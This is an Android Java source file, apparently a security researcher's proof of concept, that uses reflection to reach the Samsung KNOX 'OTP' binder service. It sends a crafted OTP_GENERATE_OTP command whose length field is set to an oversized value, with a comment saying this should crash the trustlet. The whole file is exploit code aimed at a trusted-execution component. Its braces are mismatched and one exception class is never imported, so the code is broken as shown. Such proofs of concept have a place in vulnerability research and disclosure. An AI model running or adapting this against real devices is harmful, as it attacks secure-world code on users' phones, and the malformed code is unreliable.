package com.example.laginimaineb.otp;
|
|
import android.os.IBinder;
|
import android.os.Parcel;
|
import android.os.RemoteException;
|
import android.support.v7.app.AppCompatActivity;
|
import android.os.Bundle;
|
import android.util.Log;
|
|
public class OneWhoKNOX extends AppCompatActivity {
|
|
/**
|
* The logtag used.
|
*/
|
private static final String LOGTAG = "OTP_TEST";
|
|
/**
|
* The name of the OTP binder service.
|
*/
|
private static final String INTERFACE_DESCRIPTOR = "OTP";
|
|
@Override
|
protected void onCreate(Bundle savedInstanceState) {
|
super.onCreate(savedInstanceState);
|
setContentView(R.layout.activity_main);
|
|
try {
|
//Getting the binder
|
Class smClass = Class.forName("android.os.ServiceManager");
|
IBinder binder = (IBinder) smClass.getMethod("getService", String.class).invoke(null, INTERFACE_DESCRIPTOR);
|
|
//Writing a command with a large length field
|
Parcel parcel = Parcel.obtain();
|
Parcel reply = Parcel.obtain();
|
parcel.writeInterfaceToken(INTERFACE_DESCRIPTOR);
|
byte[] command = new byte[0xDA7];
|
|
//Setting the command to OTP_GENERATE_OTP
|
command[0] = 0x02;
|
command[1] = 0x00;
|
command[2] = 0x00;
|
command[3] = 0x00;
|
|
//Setting the length field to something insane
|
command[0x41C] = (byte)0xFF;
|
command[0x41C + 1] = (byte)0xFF;
|
command[0x41C + 2] = (byte)0x00;
|
command[0x41C + 3] = (byte)0x00;
|
|
//Sending the command (should crash the trustlet)
|
parcel.writeByteArray(command);
|
binder.transact(2, parcel, reply, 0);
|
Log.e(LOGTAG, "res=" + reply.readInt());
|
reply.recycle();
|
parcel.recycle();
|
|
} catch (ClassNotFoundException |
|
NoSuchMethodException |
|
IllegalAccessException |
|
InvocationTargetException ex) {
|
Log.e(LOGTAG, "Failed to dynamically load ServiceManager methods", ex);
|
}
|
|
} catch (RemoteException ex) {
|
Log.e(LOGTAG, "Failed to communicate with remote binder", ex);
|
}
|
}
|
}
|
|